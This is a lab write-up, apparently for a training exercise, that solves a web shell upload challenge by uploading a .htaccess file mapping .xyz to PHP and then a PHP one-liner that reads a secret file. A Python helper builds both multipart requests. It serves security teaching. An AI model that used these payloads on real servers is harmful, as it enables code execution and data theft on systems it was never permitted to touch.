apt | [Solution]Web shell upload via extension blacklist bypass


To solve the lab we have to upload a PHP file that reads /home/carlos/secret and returns its contents.

Approach to solve


Description: In this lab we have to upload a PHP file, but the .php extension is blacklisted. So we have to upload a .htaccess file that changes the server configuration, and then upload our PHP code under an extension the blacklist does not cover.

The PHP file we'll be using is aa.php. It contains the one-line payload that reads /home/carlos/secret (the same contents we upload later under the name aa.xyz).


Trying to upload a PHP file

As we try to upload a file with the .php extension we get an error saying that PHP files are not allowed.


Intercepting the request

Now intercept the upload request in Burp Suite and send it to Repeater, as we have to modify and resend the same request several times.


Making a .htaccess file to execute PHP

As aa.php is not allowed, the basic logic of the bypass is to modify .htaccess (Apache's per-directory configuration file, which the upload directory honours) so that some arbitrary extension, say .xyz, is mapped to the PHP handler. Once that is in place, a file uploaded with a .xyz extension is executed as PHP even though the blacklist never sees ".php".

To upload the .htaccess file, change the filename in the multipart request from aa.php to .htaccess and change the part's Content-Type to text/plain, since it is the most common MIME type for plain-text files and the server accepts it. Note that .htaccess itself passes the check: its only "extension" is .htaccess, which is not on the blacklist.


Then change the content to AddType application/x-httpd-php .xyz. With this in place the server treats files with the .xyz extension as PHP. This only works because the lab's Apache allows .htaccess overrides in the upload directory (AllowOverride) and runs PHP through mod_php; a server that ignores .htaccess files, or that serves uploads with a handler that never executes them, would not be affected by this step.


Send the request and you'll get a 200 OK response saying that the file .htaccess has been uploaded.


Now that the server is configured to treat .xyz as PHP, change the filename to aa.xyz and the file contents to

<?php echo file_get_contents('/home/carlos/secret'); ?> 

This will display the contents of the secret file when the uploaded file is requested.


Now send the request and you will get a 200 OK response that aa.xyz has been uploaded.
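The two-step procedure above, modelled as an added example that is not part of the original post: a minimal version of the vulnerable extension check, and a builder for the two multipart bodies we sent from Repeater (.htaccess first, then aa.xyz). The form field name "avatar", the boundary string and the assumption that the blacklist contains only ".php" are assumptions; the two payloads are the ones used in the writeup.

```python
"""Model of the .htaccess extension-blacklist bypass used in the lab.

Added example, not code from the original post. The field name "avatar",
the boundary string and the exact blacklist are assumptions; the two file
payloads are the ones the writeup uploads.
"""

# Assumption: the lab's check rejects ".php" only (the page shows just the
# "php files are not allowed" error, not the full list).
BLACKLISTED_EXTENSIONS = {".php"}

# The two payloads from the writeup, in the order they must be sent.
HTACCESS_BODY = b"AddType application/x-httpd-php .xyz"
SHELL_BODY = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"


def blacklist_allows(filename: str) -> bool:
    """Vulnerable check: compare only the final extension against a blacklist.

    ".htaccess" has no blacklisted extension and "aa.xyz" is unknown to the
    list, so both pass while "aa.php" is refused.
    """
    dot = filename.rfind(".")
    ext = filename[dot:].lower() if dot != -1 else ""
    return ext not in BLACKLISTED_EXTENSIONS


def build_multipart(field, filename, content_type, body, boundary, extra_fields=None):
    """Build a multipart/form-data request body with one file part.

    extra_fields holds any plain text fields the real form also sends
    (for example a CSRF token), each emitted as its own part.
    """
    parts = []
    for name, value in (extra_fields or {}).items():
        parts += [
            f"--{boundary}".encode(),
            f'Content-Disposition: form-data; name="{name}"'.encode(),
            b"",
            value.encode(),
        ]
    parts += [
        f"--{boundary}".encode(),
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"'.encode(),
        f"Content-Type: {content_type}".encode(),
        b"",
        body,
        f"--{boundary}--".encode(),
        b"",
    ]
    return b"\r\n".join(parts)


def bypass_requests(boundary="----WebKitFormBoundaryExample", extra_fields=None):
    """Return [(filename, body), ...] for the two uploads, .htaccess first.

    Both parts are sent as text/plain, exactly as done in Repeater; each
    filename is first run through the vulnerable check to show it passes.
    """
    uploads = [(".htaccess", HTACCESS_BODY), ("aa.xyz", SHELL_BODY)]
    out = []
    for name, content in uploads:
        assert blacklist_allows(name), f"{name} would be refused"
        out.append((name, build_multipart("avatar", name, "text/plain", content, boundary, extra_fields)))
    return out


if __name__ == "__main__":
    print("aa.php allowed?", blacklist_allows("aa.php"))  # False
    for name, body in bypass_requests("XYZ"):
        print(f"--- upload {name} ---")
        print(body.decode())
```

The order matters: the .htaccess body must be on the server before aa.xyz is requested, otherwise Apache serves aa.xyz as an unknown static file instead of executing it. The same builder also shows why a blacklist is the wrong control: any extension not on the list, and any dotfile, walks straight through.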


Opening the uploaded image to execute the code

Go back to the account page and open the uploaded avatar image. Its address can be found with Inspect Element, from the src attribute the image is being served from.


The easy way is to just open the image in a new tab!


The response contains the secret (the flag); submit it to solve the lab.